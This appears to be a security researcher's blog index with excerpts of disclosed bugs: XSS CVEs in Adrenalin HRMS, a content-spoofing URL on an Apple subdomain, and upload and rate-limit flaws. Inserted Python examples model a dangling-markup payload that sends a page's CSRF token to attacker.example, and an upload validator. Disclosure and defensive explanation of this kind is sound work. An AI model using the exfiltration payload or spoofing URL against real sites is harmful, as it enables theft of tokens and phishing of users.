
Posts

Showing posts with the label BB

A short story of Content Spoofing to HTML Injection in Apple using Dangling Markup Injection

Content spoofing is an injection in which user input is reflected as-is in the application response, which can be abused for phishing. During the recon phase I found itunesconnect.apple.com, a subdomain of Apple, and after digging into it I observed that the content of the errorKey parameter was reflected back into the page, as shown below. Payload - https://itunesconnect.apple.com/login?errorKey=This%20message%20can%20be%20changed%20by%20attacker.%20This%20is%20content%20spoofing%20till%20now.%20Let%20try%20to%20exploit%20it%20further. With normal inline Cross-Site Scripting (XSS) payloads, the application gave a blank pop-up. After trying different scenarios, I observed that dangling markup injection was possible on the vulnerable parameter (errorKey). Let's understand the concept of dangling markup injection. Dangling markup injection is very useful where we can't find a way to execute our JavaScript due to input filters, content security policy, ...
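The mechanism behind dangling markup, as an added example that is not the post's exploit and not Apple's code: a reflected parameter opens a single-quoted `src` attribute and never closes it, so the browser's tokenizer keeps reading the page's own markup as the attribute value until the next single quote, and sends all of it to the attacker's host as part of the image URL. The page layout, the CSRF token value, the host attacker.example and the small `parse_start_tag` tokenizer model (no entity decoding) are all constructed for this illustration.

```python
"""Added example: how a dangling-markup payload captures the HTML that follows it.

Constructed for illustration: the page layout, the token value and the attacker
host are made up, and parse_start_tag is a deliberately small model of the HTML
tokenizer's start-tag / quoted-attribute-value states (no entity decoding).
"""
import html

WHITESPACE = " \t\n\r\f"

# Constructed stand-in for a login page that reflects an errorKey parameter.
def render_login_page(error_key: str, escape_output: bool) -> str:
    shown = html.escape(error_key, quote=True) if escape_output else error_key
    return (
        "<html><body>\n"
        f'<div class="error">{shown}</div>\n'
        '<form method="post" action="/login">\n'
        '<input type="hidden" name="csrf" value="c5f3d1a9e0b2">\n'   # constructed token
        '<input name="user"><input name="pass" type="password">\n'
        "</form>\n"
        "<a href='/forgot'>Forgot password?</a>\n"   # first single quote after the injection point
        "</body></html>\n"
    )

# The payload opens a single-quoted attribute and never closes it; the browser
# keeps reading the attribute value until the next single quote in the page.
PAYLOAD = "<img src='https://attacker.example/log?"

def parse_start_tag(markup: str, pos: int):
    """Parse one start tag beginning at markup[pos] the way a browser's tokenizer would.

    Returns (tag_name, attrs, end_pos), or None when the tag runs into end of
    input (the tokenizer drops such a tag, so no request would be made)."""
    n = len(markup)
    i = pos + 1
    j = i
    while j < n and markup[j] not in WHITESPACE + "/>":
        j += 1
    name, i, attrs = markup[i:j].lower(), j, {}
    while i < n:
        c = markup[i]
        if c in WHITESPACE + "/":              # '/' not followed by '>' is ignored
            i += 1
            continue
        if c == ">":
            return name, attrs, i + 1
        j = i                                   # attribute-name state
        while j < n and markup[j] not in WHITESPACE + "/>=":
            j += 1
        attr, i = markup[i:j].lower(), j
        while i < n and markup[i] in WHITESPACE:
            i += 1
        value = ""
        if i < n and markup[i] == "=":
            i += 1
            while i < n and markup[i] in WHITESPACE:
                i += 1
            if i < n and markup[i] in "'\"":    # quoted value: runs to the matching quote
                quote = markup[i]
                j = markup.find(quote, i + 1)
                if j == -1:
                    return None                 # eof-in-tag: tag discarded
                value, i = markup[i + 1:j], j + 1
            else:                               # unquoted value: runs to whitespace or '>'
                j = i
                while j < n and markup[j] not in WHITESPACE + ">":
                    j += 1
                value, i = markup[i:j], j
        attrs.setdefault(attr, value)           # first occurrence of a name wins
    return None

def exfiltrated_url(page: str):
    """The URL the browser would request for the first <img> in the page, or None."""
    pos = page.find("<img")
    if pos == -1:
        return None
    parsed = parse_start_tag(page, pos)
    return parsed[1].get("src") if parsed else None

if __name__ == "__main__":
    print("vulnerable page requests:", repr(exfiltrated_url(render_login_page(PAYLOAD, False))))
    print("escaped page requests:", exfiltrated_url(render_login_page(PAYLOAD, True)))
```

Two things follow from the model. The payload's trailing `?` turns everything captured (here the form with its hidden token) into the query string of the request, so no script execution is needed; and the fix is the same contextual output encoding that stops XSS (the `escape_output=True` path), with a CSP `img-src` restriction as a second layer that limits where such a request could go.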

Microsoft Bot Framework - Unvalidated File Upload | Online Service Acknowledgements | Rishu Ranjan

Microsoft Bot Framework unvalidated file upload: the issue allowed a malicious actor to upload any file, with neither the extension nor the content type of the file being validated. Acknowledgment: Microsoft Online Service Acknowledgements for July 2019 ( https://portal.msrc.microsoft.com/en-us/security-guidance/researcher-acknowledgments-online-services?rtc=1 )
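What a server-side check for this class of bug looks like, as an added example (not the Bot Framework's code): an extension allowlist on the last suffix only, a magic-byte check that the bytes really are the claimed type, a size cap, and a server-chosen storage name. The allowlist, size limit and sample payloads are constructed for the example; the client's Content-Type header is deliberately not an input, since it is attacker-controlled.

```python
"""Added example: validating an upload by allowlisted extension plus magic bytes.

Constructed for illustration; the allowlist, the size cap and the sample
files below are made up and not taken from any real service.
"""
import secrets

# Constructed allowlist: each permitted extension maps to the byte signatures a
# genuine file of that type starts with. Anything not listed is rejected.
SIGNATURES = {
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif":  (b"GIF87a", b"GIF89a"),
    ".pdf":  (b"%PDF-",),
}
MAX_BYTES = 5 * 1024 * 1024   # constructed size cap

class UploadRejected(ValueError):
    pass

def validate_upload(filename: str, data: bytes) -> str:
    """Return the normalised extension if the upload is acceptable, else raise UploadRejected."""
    if not data or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")
    # Drop path components (either separator) so "../x.png" cannot escape the upload dir.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        raise UploadRejected("no extension")
    ext = "." + base.rsplit(".", 1)[1].lower()   # only the LAST suffix decides the type
    if ext not in SIGNATURES:
        raise UploadRejected(f"extension {ext} not allowed")
    # The bytes must match the claimed type; a webshell renamed to .png fails here.
    if not any(data.startswith(sig) for sig in SIGNATURES[ext]):
        raise UploadRejected("content does not match the claimed type")
    return ext

def is_accepted(filename: str, data: bytes) -> bool:
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False

def stored_name(filename: str, data: bytes) -> str:
    """Server-chosen name: random token plus the validated extension, never the user's name."""
    return secrets.token_hex(16) + validate_upload(filename, data)

# Constructed sample inputs: a PNG header with a junk body, and an ASP.NET page directive.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
ASPX_SAMPLE = b'<%@ Page Language="C#" %>'

if __name__ == "__main__":
    for name, blob in [("avatar.PNG", PNG_SAMPLE), ("shell.aspx", ASPX_SAMPLE),
                       ("shell.png", ASPX_SAMPLE), ("../../etc/x.png", PNG_SAMPLE)]:
        print(f"{name!r}: {'accepted' if is_accepted(name, blob) else 'rejected'}")
```

The magic-byte check catches renamed scripts but not polyglots (a valid PNG with script text appended), so the stored file should also live outside the web root and be served with a fixed Content-Type and `X-Content-Type-Options: nosniff`; and on servers that honour every suffix (Apache mod_mime style), a name like `shell.php.png` still needs the server-chosen name above rather than the user's.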

Google Blogger- Insecure Implementation of Request Limiter | Google Honourable Mentions | Rishu Ranjan

The issue allowed a malicious actor to bypass a naively implemented rate limiter on the profile view counter and increase a profile's view count indefinitely. The following are the steps to reproduce, for which I used my own Blogger account ( https://www.blogger.com/profile/09844396241453600561 )

CVE-2018-12653: Reflected Cross Site Scripting(XSS) in Adrenalin 5.4 HRMS Software | SSRSDynamicEditReports [issue 5 of 5]

As a cyber security professional, I come across a wide variety of vulnerabilities, from critical to low and sometimes informational (how to categorise them - CVSS v3). Some time back I was doing my usual security assessment activity for a Bank (confidential) on their HRMS web application, a third-party product whose vendor was "Adrenalin".
CVE ID: CVE-2018-12653
Vulnerability Name: Reflected Cross Site Scripting (XSS)
Product: Adrenalin HRMS
Affected Version: 5.4.0
Credits: Rishu Ranjan
CVE-2018-12653 Details: The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVE-2018-12653 to this issue; the ID was issued by the MITRE Corporation (MITRE), as the vendor is not a CVE Numbering Authority (CNA).
CVSS Score: CVSS Base Score 6.1; Vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N; Impact Subscore 2.7; Exploitability Subscore 2.8
Current Description: A Reflected Cross Site Scripting (XSS) vulnerability was discovered in Adrenalin 5.4 HRMS, which is publicly availabl...

CVE-2018-12652: Reflected Cross Site Scripting(XSS) in Adrenalin 5.4 HRMS Software | LeaveEmployeeSearch [issue 4 of 5]

As a cyber security professional, I come across a wide variety of vulnerabilities, from critical to low and sometimes informational (how to categorise them - CVSS v3). Some time back I was doing my usual security assessment activity for a Bank (confidential) on their HRMS web application, a third-party product whose vendor was "Adrenalin".
CVE ID: CVE-2018-12652
Vulnerability Name: Reflected Cross Site Scripting (XSS)
Product: Adrenalin HRMS
Affected Version: 5.4.0
Credits: Rishu Ranjan

CVE-2018-12651: Reflected Cross Site Scripting(XSS) in Adrenalin 5.4 HRMS Software | ShiftEmployeeSearch [issue 3 of 5]

As a cyber security professional, I come across a wide variety of vulnerabilities, from critical to low and sometimes informational (how to categorise them - CVSS v3). Some time back, I was doing my usual security assessment activity for a Client (confidential) on their HRMS web application, a third-party product whose vendor was "Adrenalin".
CVE ID: CVE-2018-12651
Vulnerability Name: Reflected Cross Site Scripting (XSS)
Product: Adrenalin HRMS
Affected Version: 5.4
Source: MITRE
Credits: Rishu Ranjan

CVE-2018-12650: Reflected Cross Site Scripting(XSS) in Adrenalin 5.4.0 HRMS Software | ApplicationtEmployeeSearch [issue 2 of 5]

As a cyber security professional, I come across a wide variety of vulnerabilities, from critical to low and sometimes informational (how to categorise them - CVSS v3). Some time back I was doing my usual security assessment activity for a Client (confidential) on their HRMS web application, a third-party product whose vendor was "Adrenalin".
CVE ID: CVE-2018-12650
Vulnerability Name: Reflected Cross Site Scripting (XSS)
Product: Adrenalin HRMS
Affected Version: 5.4.0
Credits: Rishu Ranjan

CVE-2018-12234: Reflected Cross Site Scripting(XSS) in Adrenalin 5.4.0 HRMS Software | GeneralInfo [issue 1 of 5]

As a cyber security professional, I come across a wide variety of vulnerabilities, ranging from critical to low and sometimes informational (classification - CVSS v3). Some time ago, I was performing my usual security assessment for a Client (confidential) on their HRMS web application, a third-party product whose vendor is "Adrenalin".
CVE ID: CVE-2018-12234
Vulnerability Name: Reflected Cross Site Scripting (XSS)
Product: Adrenalin HRMS
Affected Version: 5.4.0
Source: MITRE
Credits: Rishu Ranjan
CVE-2018-12234 Details: The Common Vulnerabilities and Exposures (CVE) project has assigned the ID CVE-2018-12234 to this issue; the ID was issued by the MITRE Corporation (MITRE), as the vendor is not a CVE Numbering Authority (CNA).
CVSS Score: CVSS Base Score 6.1; Vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N; Impact Subscore 2.7; Exploitability Subscore 2.8
Current Description: A Reflected Cross Site Scripting (XSS) vulnerability was discovered in...